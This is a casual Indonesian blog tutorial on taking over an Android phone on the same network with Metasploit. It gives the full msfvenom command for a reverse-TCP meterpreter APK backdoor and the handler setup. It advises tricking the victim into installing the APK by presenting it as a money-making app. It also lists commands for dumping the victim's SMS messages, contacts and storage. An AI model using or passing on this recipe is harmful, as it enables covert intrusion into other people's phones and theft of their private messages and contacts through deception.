Exploitasi Android Satu Jaringan Di BackBox - HeroIT

Learn until whenever

Selasa, 13 Juni 2017

Exploitasi Android Satu Jaringan Di BackBox





Hello Afik fans
kali ini gw mau share tutorial exploitasi android satu jaringan
untuk os nya gw pake Linux BackBox :v
nah korban nya pakek android saya :v (biar gampang)
sebenernya mau pakek punya adek gw tapi gk mau dia ny, takut dilihat sms nya
kali awokawokawoka:v


Langsung  aja yaa


BAHAN :

1. Tolls metasploit
2. Payload / Backdoor untuk exploitasi anroid nya (untuk tutor kali ini extensi nya apk)
3. ketampanan (ini paling penting :v)

oh yaa ini harus satu jaringan yaa ???? misalkan kalian pakek wifi indischool ya korban juga harus pakek wifi indischool :v kalo untuk beda jaringan
next tutor aja eaaa, lagian ini juga sbenernya iseng2 doang :v


LANGKAH :

1. Buat payload nya dengan mengetikan perintah berikut :

msfvenom -p android/meterpreter/reverse_tcp lhost= (ip address kalian)  lport=4444 R > /root/android.apk

   lhost : ip address yang kalian dapat  ketikan ifconfig untuk melihat

   lport : 4444

2. Kalo payload sudah di buat, kirim payload nya ke korban, nah disini yakin kan korban biar mau install payload yg sudah terbuat tadi
misal bilang kalo ini aplikasi penghasil uang :v (missal)

3. tunggu korban mengsintall payload nya

4. sambil nunggu buka exploit nya dengan mengetikan perintah msfconsole

5. ketikan perintah berikut di setiap session ny


  •        use exploit/multi/handler
  •        set payload android/meterpreter/reverse_tcp
  •        set lhost (isikan ip address kita tadi)
  •        set lport 4444
  •        exploit
6. kita tunggu sampai korban mengeksekusi nya

7. kalo korban berhasil terexploitasi hasil nya kek gini


kalo udah kalian bisa ngapain aja :v

 bisa lihat perintah ya dengan mengetik help

 saya disini coba melihat sms dengan mengetikan dump_sms
 dan melihat kontak dengan perintah dump_contact
 dan melihat isi sdcard saya dengan perintah ls sdcard
 dan masih banyak oke sekian dulu yaa kuota gw habis neh :v

kalo bingung bisa lihat video nya di sini

Tidak ada komentar:

Posting Komentar